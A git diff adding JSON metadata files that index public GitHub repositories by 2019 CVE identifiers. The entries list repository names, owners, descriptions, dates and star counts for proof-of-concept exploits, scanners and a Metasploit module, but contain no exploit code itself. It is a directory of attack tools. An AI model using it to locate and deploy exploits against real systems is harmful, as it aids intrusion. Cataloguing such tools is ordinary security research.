"2024-01-28T09:42:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-3403.json b/2019/CVE-2019-3403.json new file mode 100644 index 0000000000..e0fddcc9b1 --- /dev/null +++ b/2019/CVE-2019-3403.json @@ -0,0 +1,64 @@ +[ + { + "id": 295868190, + "name": "UserEnumJira", + "full_name": "und3sc0n0c1d0\/UserEnumJira", + "owner": { + "login": "und3sc0n0c1d0", + "id": 32236059, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32236059?v=4", + "html_url": "https:\/\/github.com\/und3sc0n0c1d0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/und3sc0n0c1d0\/UserEnumJira", + "description": "Serie de scripts para enumerar nombres de usuarios de JIRA a partir de vulnerabilidades conocidas (CVE-2020-14181, CVE-2019-3403, CVE-2019-8449...)", + "fork": false, + "created_at": "2020-09-15T23:00:03Z", + "updated_at": "2022-12-29T16:40:10Z", + "pushed_at": "2021-05-03T00:39:18Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 349235683, + "name": "CVE-2019-3403", + "full_name": "davidmckennirey\/CVE-2019-3403", + "owner": { + "login": "davidmckennirey", + "id": 26097321, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26097321?v=4", + "html_url": "https:\/\/github.com\/davidmckennirey", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/davidmckennirey\/CVE-2019-3403", + "description": "A simple python3 exploit for CVE-2019-3403", + "fork": false, + "created_at": "2021-03-18T22:36:58Z", + "updated_at": "2024-07-05T18:42:37Z", + "pushed_at": "2021-03-22T20:50:31Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-3462.json b/2019/CVE-2019-3462.json new file mode 100644 index 0000000000..231c3f1662 --- /dev/null +++ b/2019/CVE-2019-3462.json @@ -0,0 +1,64 @@ +[ + { + "id": 167275161, + "name": "check_CVE-2019-3462", + "full_name": "tonejito\/check_CVE-2019-3462", + "owner": { + "login": "tonejito", + "id": 618588, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/618588?v=4", + "html_url": "https:\/\/github.com\/tonejito", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tonejito\/check_CVE-2019-3462", + "description": "Check @Debian and @Ubuntu #GNU \/ #Linux for CVE-2019-3462 in APT", + "fork": false, + "created_at": "2019-01-24T00:30:15Z", + "updated_at": "2024-08-12T19:45:09Z", + "pushed_at": "2019-01-26T01:21:36Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 2, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 170573944, + "name": "update-apt-package", + "full_name": "atilacastro\/update-apt-package", + "owner": { + "login": "atilacastro", + "id": 5832809, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5832809?v=4", + "html_url": "https:\/\/github.com\/atilacastro", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/atilacastro\/update-apt-package", + "description": "Playbook update APT package because CVE-2019-3462", + "fork": false, + "created_at": "2019-02-13T20:22:33Z", + "updated_at": "2019-02-14T18:31:31Z", + "pushed_at": "2019-02-14T18:31:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-3663.json b/2019/CVE-2019-3663.json new file mode 100644 index 0000000000..9484fe432a --- /dev/null +++ b/2019/CVE-2019-3663.json @@ -0,0 +1,33 @@ +[ + { + "id": 233549505, + "name": "mcafee_atd_CVE-2019-3663", + "full_name": "funoverip\/mcafee_atd_CVE-2019-3663", + "owner": { + "login": "funoverip", + "id": 7892650, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7892650?v=4", + "html_url": "https:\/\/github.com\/funoverip", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/funoverip\/mcafee_atd_CVE-2019-3663", + "description": " McAfee Advanced Threat Defense ATD 4.6.x and earlier - Hardcoded root password", + "fork": false, + "created_at": "2020-01-13T08:42:13Z", + "updated_at": "2020-02-28T19:55:53Z", + "pushed_at": "2020-01-13T08:57:01Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-3719.json b/2019/CVE-2019-3719.json new file mode 100644 index 0000000000..d45aea3c9d --- /dev/null +++ b/2019/CVE-2019-3719.json @@ -0,0 +1,33 @@ +[ + { + "id": 184369823, + "name": "CVE-2019-3719", + "full_name": "jiansiting\/CVE-2019-3719", + "owner": { + "login": "jiansiting", + "id": 28823754, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28823754?v=4", + "html_url": "https:\/\/github.com\/jiansiting", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jiansiting\/CVE-2019-3719", + "description": null, + "fork": false, + "created_at": "2019-05-01T04:43:55Z", + "updated_at": "2024-08-12T19:48:28Z", + "pushed_at": "2019-05-01T04:50:02Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-3778.json b/2019/CVE-2019-3778.json new file mode 100644 index 0000000000..77e0159520 --- /dev/null +++ b/2019/CVE-2019-3778.json @@ -0,0 +1,33 @@ +[ + { + "id": 214928698, + "name": "CVE-2019-3778-Spring-Security-OAuth-2.3-Open-Redirection", + "full_name": "BBB-man\/CVE-2019-3778-Spring-Security-OAuth-2.3-Open-Redirection", + "owner": { + "login": "BBB-man", + "id": 21234393, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21234393?v=4", + "html_url": "https:\/\/github.com\/BBB-man", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BBB-man\/CVE-2019-3778-Spring-Security-OAuth-2.3-Open-Redirection", + "description": "Spring Security OAuth 2.3 Open Redirection 分析复现篇", + "fork": false, + "created_at": "2019-10-14T02:15:39Z", + "updated_at": "2019-10-14T02:20:07Z", + "pushed_at": "2019-10-14T02:20:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-3799.json b/2019/CVE-2019-3799.json new file mode 100644 index 0000000000..f0a01bf059 --- /dev/null +++ b/2019/CVE-2019-3799.json @@ -0,0 +1,68 @@ +[ + { + "id": 181969843, + "name": "CVE-2019-3799", + "full_name": "mpgn\/CVE-2019-3799", + "owner": { + "login": "mpgn", + "id": 5891788, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5891788?v=4", + "html_url": "https:\/\/github.com\/mpgn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mpgn\/CVE-2019-3799", + "description": "CVE-2019-3799 - Spring Cloud Config Server: Directory Traversal < 2.1.2, 2.0.4, 1.4.6", + "fork": false, + "created_at": "2019-04-17T21:19:32Z", + "updated_at": "2024-08-12T19:48:00Z", + "pushed_at": "2019-04-18T10:08:12Z", + "stargazers_count": 31, + "watchers_count": 31, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "spring-cloud-config" + ], + "visibility": "public", + "forks": 5, + "watchers": 31, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 479029467, + "name": "SpringCloud", + "full_name": "Corgizz\/SpringCloud", + "owner": { + "login": "Corgizz", + "id": 33239583, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33239583?v=4", + "html_url": "https:\/\/github.com\/Corgizz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Corgizz\/SpringCloud", + "description": "Spring Cloud Config CVE-2019-3799|CVE_2020_5410 漏洞检测", + "fork": false, + "created_at": "2022-04-07T14:51:52Z", + "updated_at": "2022-04-07T15:04:06Z", + "pushed_at": "2022-04-07T14:58:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "java" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-3810.json b/2019/CVE-2019-3810.json new file mode 100644 index 0000000000..5725f78777 --- /dev/null +++ b/2019/CVE-2019-3810.json @@ -0,0 +1,33 @@ +[ + { + "id": 362764893, + "name": "Moodle-CVE-2019-3810", + "full_name": "farisv\/Moodle-CVE-2019-3810", + "owner": { + "login": "farisv", + "id": 44131180, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44131180?v=4", + "html_url": "https:\/\/github.com\/farisv", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/farisv\/Moodle-CVE-2019-3810", + "description": "Moodle (< 3.6.2, < 3.5.4, < 3.4.7, < 3.1.16) XSS PoC for Privilege Escalation (Student to Admin)", + "fork": false, + "created_at": "2021-04-29T09:38:08Z", + "updated_at": "2024-02-24T11:42:31Z", + "pushed_at": "2021-04-29T10:46:08Z", + "stargazers_count": 18, + "watchers_count": 18, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 18, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-3847.json b/2019/CVE-2019-3847.json new file mode 100644 index 0000000000..289931b498 --- /dev/null +++ b/2019/CVE-2019-3847.json @@ -0,0 +1,33 @@ +[ + { + "id": 179544105, + "name": "moodle-login-csrf", + "full_name": "danielthatcher\/moodle-login-csrf", + "owner": { + "login": "danielthatcher", + "id": 11726509, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11726509?v=4", + "html_url": "https:\/\/github.com\/danielthatcher", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/danielthatcher\/moodle-login-csrf", + "description": "Scripts for exploiting MSA-18-0020 (CVE-2018-16854) and MSA-19-0004 (CVE-2019-3847)", + "fork": false, + "created_at": "2019-04-04T17:24:47Z", + "updated_at": "2024-06-30T06:34:41Z", + "pushed_at": "2019-07-21T15:52:46Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 7, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-3929.json b/2019/CVE-2019-3929.json new file mode 100644 index 0000000000..d08f4e1699 --- /dev/null +++ b/2019/CVE-2019-3929.json @@ -0,0 +1,39 @@ +[ + { + "id": 209102630, + "name": "CVE-2019-3929", + "full_name": "xfox64x\/CVE-2019-3929", + "owner": { + "login": "xfox64x", + "id": 11416821, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11416821?v=4", + "html_url": "https:\/\/github.com\/xfox64x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xfox64x\/CVE-2019-3929", + "description": "Crestron\/Barco\/Extron\/InFocus\/TeqAV Remote Command Injection (CVE-2019-3929) Metasploit Module", + "fork": false, + "created_at": "2019-09-17T16:23:04Z", + "updated_at": "2023-11-01T00:56:48Z", + "pushed_at": "2019-11-25T21:17:02Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "command-injection", + "crestron", + "crestron-devices", + "metasploit", + "metasploit-modules" + ], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-3980.json b/2019/CVE-2019-3980.json new file mode 100644 index 0000000000..93e103f17a --- /dev/null +++ b/2019/CVE-2019-3980.json @@ -0,0 +1,64 @@ +[ + { + "id": 284718304, + "name": "CVE-2019-3980", + "full_name": "warferik\/CVE-2019-3980", + "owner": { + "login": "warferik", + "id": 16766938, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16766938?v=4", + "html_url": "https:\/\/github.com\/warferik", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/warferik\/CVE-2019-3980", + "description": null, + "fork": false, + "created_at": "2020-08-03T14:12:56Z", + "updated_at": "2024-08-12T20:04:23Z", + "pushed_at": "2020-12-12T03:41:43Z", + "stargazers_count": 16, + "watchers_count": 16, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 16, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 419046445, + "name": "CVE-2019-3980", + "full_name": "Barbarisch\/CVE-2019-3980", + "owner": { + "login": "Barbarisch", + "id": 613330, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/613330?v=4", + "html_url": "https:\/\/github.com\/Barbarisch", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Barbarisch\/CVE-2019-3980", + "description": "CVE-2019-3980 exploit written in win32\/c++ (openssl dependency). Port of https:\/\/github.com\/tenable\/poc\/blob\/master\/Solarwinds\/Dameware\/dwrcs_dwDrvInst_rce.py", + "fork": false, + "created_at": "2021-10-19T18:28:47Z", + "updated_at": "2024-11-26T14:23:55Z", + "pushed_at": "2021-10-19T21:19:11Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-4650.json b/2019/CVE-2019-4650.json new file mode 100644 index 0000000000..b9bbf3080f --- /dev/null +++ b/2019/CVE-2019-4650.json @@ -0,0 +1,33 @@ +[ + { + "id": 863473396, + "name": "Maximo_Sql_Injection-CVE-2019-4650", + "full_name": "aneeshanilkumar89\/Maximo_Sql_Injection-CVE-2019-4650", + "owner": { + "login": "aneeshanilkumar89", + "id": 17462611, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17462611?v=4", + "html_url": "https:\/\/github.com\/aneeshanilkumar89", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aneeshanilkumar89\/Maximo_Sql_Injection-CVE-2019-4650", + "description": "MAximo SQL Injection Time Based - Oracle DB", + "fork": false, + "created_at": "2024-09-26T11:03:25Z", + "updated_at": "2024-09-26T11:17:13Z", + "pushed_at": "2024-09-26T11:10:55Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-48814.json b/2019/CVE-2019-48814.json new file mode 100644 index 0000000000..0d9de42b82 --- /dev/null +++ b/2019/CVE-2019-48814.json @@ -0,0 +1,33 @@ +[ + { + "id": 183850213, + "name": "cve-2019-48814", + "full_name": "wucj001\/cve-2019-48814", + "owner": { + "login": "wucj001", + "id": 29703092, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29703092?v=4", + "html_url": "https:\/\/github.com\/wucj001", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wucj001\/cve-2019-48814", + "description": "漏洞利用工具", + "fork": false, + "created_at": "2019-04-28T03:24:47Z", + "updated_at": "2019-06-19T18:43:16Z", + "pushed_at": "2019-06-19T18:43:14Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-5010.json b/2019/CVE-2019-5010.json new file mode 100644 index 0000000000..5616677eb4 --- /dev/null +++ b/2019/CVE-2019-5010.json @@ -0,0 +1,40 @@ +[ + { + "id": 219936583, + "name": "CVE-2019-5010", + "full_name": "JonathanWilbur\/CVE-2019-5010", + "owner": { + "login": "JonathanWilbur", + "id": 20342114, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20342114?v=4", + "html_url": "https:\/\/github.com\/JonathanWilbur", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JonathanWilbur\/CVE-2019-5010", + "description": "CVE-2019-5010 Exploit PoC - Python Denial of Service via Malformed X.509v3 Extension", + "fork": false, + "created_at": "2019-11-06T07:26:43Z", + "updated_at": "2019-11-06T07:27:36Z", + "pushed_at": "2023-01-24T00:45:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "denial-of-service", + "dos", + "exploit", + "python", + "x509", + "x509certificates" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-5029.json b/2019/CVE-2019-5029.json new file mode 100644 index 0000000000..04966286e7 --- /dev/null +++ b/2019/CVE-2019-5029.json @@ -0,0 +1,33 @@ +[ + { + "id": 731386499, + "name": "Exihibitor-RCE", + "full_name": "thehunt1s0n\/Exihibitor-RCE", + "owner": { + "login": "thehunt1s0n", + "id": 118664797, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/118664797?v=4", + "html_url": "https:\/\/github.com\/thehunt1s0n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thehunt1s0n\/Exihibitor-RCE", + "description": "Exihibitor Web Ui 1.7.1 RCE, CVE-2019-5029", + "fork": false, + "created_at": "2023-12-14T01:05:45Z", + "updated_at": "2024-01-27T02:54:03Z", + "pushed_at": "2024-02-10T09:36:11Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-5096.json b/2019/CVE-2019-5096.json new file mode 100644 index 0000000000..7a2a14c147 --- /dev/null +++ b/2019/CVE-2019-5096.json @@ -0,0 +1,33 @@ +[ + { + "id": 244423318, + "name": "CVE-2019-5096-GoAhead-Web-Server-Dos-Exploit", + "full_name": "ianxtianxt\/CVE-2019-5096-GoAhead-Web-Server-Dos-Exploit", + "owner": { + "login": "ianxtianxt", + "id": 45796484, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45796484?v=4", + "html_url": "https:\/\/github.com\/ianxtianxt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ianxtianxt\/CVE-2019-5096-GoAhead-Web-Server-Dos-Exploit", + "description": "CVE-2019-5096(UAF in upload handler) exploit cause Denial of Service", + "fork": false, + "created_at": "2020-03-02T16:48:02Z", + "updated_at": "2023-11-16T13:37:18Z", + "pushed_at": "2020-02-17T13:47:55Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-5413.json b/2019/CVE-2019-5413.json new file mode 100644 index 0000000000..d1b71b28d1 --- /dev/null +++ b/2019/CVE-2019-5413.json @@ -0,0 +1,64 @@ +[ + { + "id": 335788904, + "name": "CVE-2019-5413-NetBeans", + "full_name": "forse01\/CVE-2019-5413-NetBeans", + "owner": { + "login": "forse01", + "id": 76189258, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76189258?v=4", + "html_url": "https:\/\/github.com\/forse01", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/forse01\/CVE-2019-5413-NetBeans", + "description": null, + "fork": false, + "created_at": "2021-02-04T00:02:59Z", + "updated_at": "2021-02-10T02:16:24Z", + "pushed_at": "2021-02-10T02:16:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 339316905, + "name": "CVE-2019-5413-NetBeans-NoJson", + "full_name": "forse01\/CVE-2019-5413-NetBeans-NoJson", + "owner": { + "login": "forse01", + "id": 76189258, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76189258?v=4", + "html_url": "https:\/\/github.com\/forse01", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/forse01\/CVE-2019-5413-NetBeans-NoJson", + "description": null, + "fork": false, + "created_at": "2021-02-16T07:25:57Z", + "updated_at": "2021-02-16T07:27:53Z", + "pushed_at": "2021-02-16T07:27:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-5418.json b/2019/CVE-2019-5418.json new file mode 100644 index 0000000000..2bf8255b46 --- /dev/null +++ b/2019/CVE-2019-5418.json @@ -0,0 +1,289 @@ +[ + { + "id": 175966226, + "name": "CVE-2019-5418", + "full_name": "mpgn\/CVE-2019-5418", + "owner": { + "login": "mpgn", + "id": 5891788, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5891788?v=4", + "html_url": "https:\/\/github.com\/mpgn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mpgn\/CVE-2019-5418", + "description": "CVE-2019-5418 - File Content Disclosure on Ruby on Rails", + "fork": false, + "created_at": "2019-03-16T11:58:18Z", + "updated_at": "2024-10-05T05:18:16Z", + "pushed_at": "2021-04-05T21:28:36Z", + "stargazers_count": 193, + "watchers_count": 193, + "has_discussions": false, + "forks_count": 24, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "rails" + ], + "visibility": "public", + "forks": 24, + "watchers": 193, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 176323109, + "name": "CVE-2019-5418", + "full_name": "omarkurt\/CVE-2019-5418", + "owner": { + "login": "omarkurt", + "id": 1712468, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1712468?v=4", + "html_url": "https:\/\/github.com\/omarkurt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/omarkurt\/CVE-2019-5418", + "description": "File Content Disclosure on Rails Test Case - CVE-2019-5418", + "fork": false, + "created_at": "2019-03-18T16:09:13Z", + "updated_at": "2021-06-23T14:36:20Z", + "pushed_at": "2019-03-18T16:15:25Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2019-5418", + "ror", + "vulnerable-app" + ], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 176545257, + "name": "CVE-2019-5418-Scanner", + "full_name": "brompwnie\/CVE-2019-5418-Scanner", + "owner": { + "login": "brompwnie", + "id": 8638589, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8638589?v=4", + "html_url": "https:\/\/github.com\/brompwnie", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/brompwnie\/CVE-2019-5418-Scanner", + "description": "A multi-threaded Golang scanner to identify Ruby endpoints vulnerable to CVE-2019-5418", + "fork": false, + "created_at": "2019-03-19T15:38:01Z", + "updated_at": "2024-08-12T19:46:56Z", + "pushed_at": "2019-03-21T17:26:06Z", + "stargazers_count": 35, + "watchers_count": 35, + "has_discussions": false, + "forks_count": 16, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 16, + "watchers": 35, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 177236589, + "name": "Rails-doubletap-RCE", + "full_name": "mpgn\/Rails-doubletap-RCE", + "owner": { + "login": "mpgn", + "id": 5891788, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5891788?v=4", + "html_url": "https:\/\/github.com\/mpgn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mpgn\/Rails-doubletap-RCE", + "description": "RCE on Rails 5.2.2 using a path traversal (CVE-2019-5418) and a deserialization of Ruby objects (CVE-2019-5420)", + "fork": false, + "created_at": "2019-03-23T02:52:31Z", + "updated_at": "2024-09-17T07:15:40Z", + "pushed_at": "2023-01-19T12:13:40Z", + "stargazers_count": 134, + "watchers_count": 134, + "has_discussions": false, + "forks_count": 28, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "rails" + ], + "visibility": "public", + "forks": 28, + "watchers": 134, + "score": 0, + "subscribers_count": 7 + }, + { + "id": 178527770, + "name": "CVE-2019-5418", + "full_name": "takeokunn\/CVE-2019-5418", + "owner": { + "login": "takeokunn", + "id": 11222510, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11222510?v=4", + "html_url": "https:\/\/github.com\/takeokunn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/takeokunn\/CVE-2019-5418", + "description": null, + "fork": false, + "created_at": "2019-03-30T07:40:11Z", + "updated_at": "2019-10-24T19:07:56Z", + "pushed_at": "2019-03-30T07:54:58Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 178909066, + "name": "RailroadBandit", + "full_name": "Bad3r\/RailroadBandit", + "owner": { + "login": "Bad3r", + "id": 25513724, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25513724?v=4", + "html_url": "https:\/\/github.com\/Bad3r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Bad3r\/RailroadBandit", + "description": "a demo for Ruby on Rails CVE-2019-5418", + "fork": false, + "created_at": "2019-04-01T17:02:57Z", + "updated_at": "2024-05-22T12:43:49Z", + "pushed_at": "2019-04-11T22:45:52Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 212888337, + "name": "CVE-2019-5418-Rails3", + "full_name": "ztgrace\/CVE-2019-5418-Rails3", + "owner": { + "login": "ztgrace", + "id": 2554037, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2554037?v=4", + "html_url": "https:\/\/github.com\/ztgrace", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ztgrace\/CVE-2019-5418-Rails3", + "description": "Rails 3 PoC of CVE-2019-5418", + "fork": false, + "created_at": "2019-10-04T19:28:10Z", + "updated_at": "2019-10-04T19:29:56Z", + "pushed_at": "2023-07-13T22:14:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 222660643, + "name": "CVE-2019-5418", + "full_name": "random-robbie\/CVE-2019-5418", + "owner": { + "login": "random-robbie", + "id": 4902869, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4902869?v=4", + "html_url": "https:\/\/github.com\/random-robbie", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/random-robbie\/CVE-2019-5418", + "description": null, + "fork": false, + "created_at": "2019-11-19T09:40:06Z", + "updated_at": "2021-04-26T19:41:51Z", + "pushed_at": "2019-11-19T09:41:18Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + 